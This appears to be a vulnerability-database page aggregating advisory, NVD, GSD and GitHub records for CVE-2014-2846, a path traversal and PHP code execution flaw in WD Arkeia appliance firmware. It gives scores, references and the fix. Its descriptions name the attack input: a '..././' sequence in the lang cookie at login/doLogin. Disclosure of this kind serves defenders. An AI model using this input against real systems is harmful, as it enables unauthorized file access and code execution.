fixed version\n2014-04-23: SEC Consult releases a coordinated security advisory. \n\n\nSolution:\n---------\nUpdate to the most recent version (10.2.9) of Arkeia Network Backup. \n\nMore information can be found at:\nhttp://wiki.arkeia.com/index.php/Path_Traversal_Remote_Code_Execution\n\n\nWorkaround:\n-----------\n\n\nAdvisory URL:\n-------------\nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm\n\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nSEC Consult Vulnerability Lab\n\nSEC Consult\nVienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius\n\nHeadquarter:\nMooslackengasse 17, 1190 Vienna, Austria\nPhone:   +43 1 8903043 0\nFax:     +43 1 8903043 15\n\nMail: research at sec-consult dot com\nWeb: https://www.sec-consult.com\nBlog: http://blog.sec-consult.com\nTwitter: https://twitter.com/sec_consult\n\nInterested to work with the experts of SEC Consult?\nWrite to career@sec-consult.com\n\nEOF M. Lucinskij / @2014\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-2846"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002293"
      },
      {
        "db": "BID",
        "id": "67039"
      },
      {
        "db": "VULHUB",
        "id": "VHN-70785"
      },
      {
        "db": "PACKETSTORM",
        "id": "126286"
      }
    ],
    "trust": 2.07
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-70785",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-70785"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2014-2846",
        "trust": 2.9
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002293",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201404-558",
        "trust": 0.7
      },
      {
        "db": "BID",
        "id": "67039",
        "trust": 0.4
      },
      {
        "db": "PACKETSTORM",
        "id": "126286",
        "trust": 0.2
      },
      {
        "db": "SEEBUG",
        "id": "SSVID-86262",
        "trust": 0.1
      },
      {
        "db": "EXPLOIT-DB",
        "id": "33005",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-70785",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-70785"
      },
      {
        "db": "BID",
        "id": "67039"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002293"
      },
      {
        "db": "PACKETSTORM",
        "id": "126286"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-2846"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201404-558"
      }
    ]
  },
  "id": "VAR-201404-0435",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-70785"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T13:53:23.080000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Backup and Recovery Server - Deployed as a Virtual Appliance",
        "trust": 0.8,
        "url": "http://www.arkeia.com/products/wd-arkeia/backup-server/virtual-appliance"
      },
      {
        "title": "arkeia_appliance_firmware_2-10.2.9",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49656"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002293"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201404-558"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-22",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-70785"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002293"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-2846"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "http://seclists.org/fulldisclosure/2014/apr/257"
      },
      {
        "trust": 1.8,
        "url": "http://wiki.arkeia.com/index.php/path_traversal_remote_code_execution"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/archive/1/531910/100/0/threaded"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2846"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-2846"
      },
      {
        "trust": 0.1,
        "url": "http://www.arkeia.com/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2846"
      },
      {
        "trust": 0.1,
        "url": "http://www.arkeia.com/en/products/arkeia-network-backup/backup-server/virtual-appliance"
      },
      {
        "trust": 0.1,
        "url": "https://www.sec-consult.com"
      },
      {
        "trust": 0.1,
        "url": "http://blog.sec-consult.com"
      },
      {
        "trust": 0.1,
        "url": "https://twitter.com/sec_consult"
      },
      {
        "trust": 0.1,
        "url": "https://www.sec-consult.com/en/vulnerability-lab/advisories.htm"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-70785"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002293"
      },
      {
        "db": "PACKETSTORM",
        "id": "126286"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-2846"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201404-558"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-70785"
      },
      {
        "db": "BID",
        "id": "67039"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002293"
      },
      {
        "db": "PACKETSTORM",
        "id": "126286"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-2846"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201404-558"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-04-28T00:00:00",
        "db": "VULHUB",
        "id": "VHN-70785"
      },
      {
        "date": "2014-04-23T00:00:00",
        "db": "BID",
        "id": "67039"
      },
      {
        "date": "2014-05-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-002293"
      },
      {
        "date": "2014-04-23T21:28:05",
        "db": "PACKETSTORM",
        "id": "126286"
      },
      {
        "date": "2014-04-28T14:09:07.877000",
        "db": "NVD",
        "id": "CVE-2014-2846"
      },
      {
        "date": "2014-04-30T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201404-558"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-02-24T00:00:00",
        "db": "VULHUB",
        "id": "VHN-70785"
      },
      {
        "date": "2014-04-23T00:00:00",
        "db": "BID",
        "id": "67039"
      },
      {
        "date": "2014-05-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-002293"
      },
      {
        "date": "2020-02-24T15:02:18.123000",
        "db": "NVD",
        "id": "CVE-2014-2846"
      },
      {
        "date": "2020-02-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201404-558"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "126286"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201404-558"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "WD Arkeia Virtual Appliance Of firmware  opt/arkeia/wui/htdocs/index.php Vulnerable to directory traversal",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002293"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "path traversal",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201404-558"
      }
    ],
    "trust": 0.6
  }
}

GSD-2014-2846

Vulnerability from gsd - Updated: 2023-12-13 01:22

Details

Aliases

CVE-2014-2846

Aliases

CVE-2014-2846

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2014-2846",
    "description": "Directory traversal vulnerability in opt/arkeia/wui/htdocs/index.php in the WD Arkeia virtual appliance (AVA) with firmware before 10.2.9 allows remote attackers to read arbitrary files and execute arbitrary PHP code via a ..././ (dot dot dot slash dot slash) in the lang Cookie parameter, as demonstrated by a request to login/doLogin.",
    "id": "GSD-2014-2846",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2014-2846"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2014-2846"
      ],
      "details": "Directory traversal vulnerability in opt/arkeia/wui/htdocs/index.php in the WD Arkeia virtual appliance (AVA) with firmware before 10.2.9 allows remote attackers to read arbitrary files and execute arbitrary PHP code via a ..././ (dot dot dot slash dot slash) in the lang Cookie parameter, as demonstrated by a request to login/doLogin.",
      "id": "GSD-2014-2846",
      "modified": "2023-12-13T01:22:46.684776Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "cve@mitre.org",
        "ID": "CVE-2014-2846",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Directory traversal vulnerability in opt/arkeia/wui/htdocs/index.php in the WD Arkeia virtual appliance (AVA) with firmware before 10.2.9 allows remote attackers to read arbitrary files and execute arbitrary PHP code via a ..././ (dot dot dot slash dot slash) in the lang Cookie parameter, as demonstrated by a request to login/doLogin."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "20140423 SEC Consult SA-20140423-0 :: Path Traversal/Remote Code Execution in WD Arkeia Network Backup Appliances",
            "refsource": "FULLDISC",
            "url": "http://seclists.org/fulldisclosure/2014/Apr/257"
          },
          {
            "name": "20140423 SEC Consult SA-20140423-0 :: Path Traversal/Remote Code Execution in WD Arkeia Network Backup Appliances",
            "refsource": "BUGTRAQ",
            "url": "http://www.securityfocus.com/archive/1/531910/100/0/threaded"
          },
          {
            "name": "http://wiki.arkeia.com/index.php/Path_Traversal_Remote_Code_Execution",
            "refsource": "CONFIRM",
            "url": "http://wiki.arkeia.com/index.php/Path_Traversal_Remote_Code_Execution"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:westerndigital:arkeia_virtual_appliance_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "10.2.7",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2014-2846"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "Directory traversal vulnerability in opt/arkeia/wui/htdocs/index.php in the WD Arkeia virtual appliance (AVA) with firmware before 10.2.9 allows remote attackers to read arbitrary files and execute arbitrary PHP code via a ..././ (dot dot dot slash dot slash) in the lang Cookie parameter, as demonstrated by a request to login/doLogin."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-22"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20140423 SEC Consult SA-20140423-0 :: Path Traversal/Remote Code Execution in WD Arkeia Network Backup Appliances",
              "refsource": "FULLDISC",
              "tags": [
                "Exploit"
              ],
              "url": "http://seclists.org/fulldisclosure/2014/Apr/257"
            },
            {
              "name": "http://wiki.arkeia.com/index.php/Path_Traversal_Remote_Code_Execution",
              "refsource": "CONFIRM",
              "tags": [],
              "url": "http://wiki.arkeia.com/index.php/Path_Traversal_Remote_Code_Execution"
            },
            {
              "name": "20140423 SEC Consult SA-20140423-0 :: Path Traversal/Remote Code Execution in WD Arkeia Network Backup Appliances",
              "refsource": "BUGTRAQ",
              "tags": [],
              "url": "http://www.securityfocus.com/archive/1/531910/100/0/threaded"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "PARTIAL",
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          "exploitabilityScore": 10.0,
          "impactScore": 6.4,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "HIGH",
          "userInteractionRequired": false
        }
      },
      "lastModifiedDate": "2020-02-24T15:02Z",
      "publishedDate": "2014-04-28T14:09Z"
    }
  }
}

FKIE_CVE-2014-2846

Vulnerability from fkie_nvd - Published: 2014-04-28 14:09 - Updated: 2025-04-12 10:46

Severity ?

Summary

References

URL	Tags
cve@mitre.org	http://seclists.org/fulldisclosure/2014/Apr/257	Exploit
cve@mitre.org	http://wiki.arkeia.com/index.php/Path_Traversal_Remote_Code_Execution
cve@mitre.org	http://www.securityfocus.com/archive/1/531910/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108	http://seclists.org/fulldisclosure/2014/Apr/257	Exploit
af854a3a-2127-422b-91ae-364da2661108	http://wiki.arkeia.com/index.php/Path_Traversal_Remote_Code_Execution
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/531910/100/0/threaded

Impacted products

	Vendor	Product	Version
	westerndigital	arkeia_virtual_appliance_firmware	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:westerndigital:arkeia_virtual_appliance_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "1C920528-2AAC-4C9A-A988-33049F33408C",
              "versionEndIncluding": "10.2.7",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Directory traversal vulnerability in opt/arkeia/wui/htdocs/index.php in the WD Arkeia virtual appliance (AVA) with firmware before 10.2.9 allows remote attackers to read arbitrary files and execute arbitrary PHP code via a ..././ (dot dot dot slash dot slash) in the lang Cookie parameter, as demonstrated by a request to login/doLogin."
    },
    {
      "lang": "es",
      "value": "Vulnerabilidad de salto de directorio en opt/arkeia/wui/htdocs/index.php en WD Arkeia Virtual Appliance (AVA) con firmware anterior a 10.2.9 permite a atacantes remotos leer archivos arbitrarios y ejecutar c\u00f3digo PHP arbitrario a trav\u00e9s de un ..././ (punto punto barra punto barra) en el par\u00e1metro lang Cookie, tal y como fue demostrado por una solicitud hacia login/doLogin."
    }
  ],
  "id": "CVE-2014-2846",
  "lastModified": "2025-04-12T10:46:40.837",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2014-04-28T14:09:07.877",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://seclists.org/fulldisclosure/2014/Apr/257"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://wiki.arkeia.com/index.php/Path_Traversal_Remote_Code_Execution"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/531910/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://seclists.org/fulldisclosure/2014/Apr/257"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://wiki.arkeia.com/index.php/Path_Traversal_Remote_Code_Execution"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/531910/100/0/threaded"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

GHSA-WQPR-5JGG-VF8Q

Vulnerability from github – Published: 2022-05-13 01:28 – Updated: 2022-05-13 01:28

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2014-2846"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2014-04-28T14:09:00Z",
    "severity": "HIGH"
  },
  "details": "Directory traversal vulnerability in opt/arkeia/wui/htdocs/index.php in the WD Arkeia virtual appliance (AVA) with firmware before 10.2.9 allows remote attackers to read arbitrary files and execute arbitrary PHP code via a ..././ (dot dot dot slash dot slash) in the lang Cookie parameter, as demonstrated by a request to login/doLogin.",
  "id": "GHSA-wqpr-5jgg-vf8q",
  "modified": "2022-05-13T01:28:15Z",
  "published": "2022-05-13T01:28:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-2846"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2014/Apr/257"
    },
    {
      "type": "WEB",
      "url": "http://wiki.arkeia.com/index.php/Path_Traversal_Remote_Code_Execution"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/archive/1/531910/100/0/threaded"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2014-2846 (GCVE-0-2014-2846)

VAR-201404-0435

Vendor description:

Business recommendation:

Proof of concept:

Vendor contact timeline:

Solution:

Workaround:

Advisory URL:

GSD-2014-2846

FKIE_CVE-2014-2846

GHSA-WQPR-5JGG-VF8Q

Tags

Sightings

Nomenclature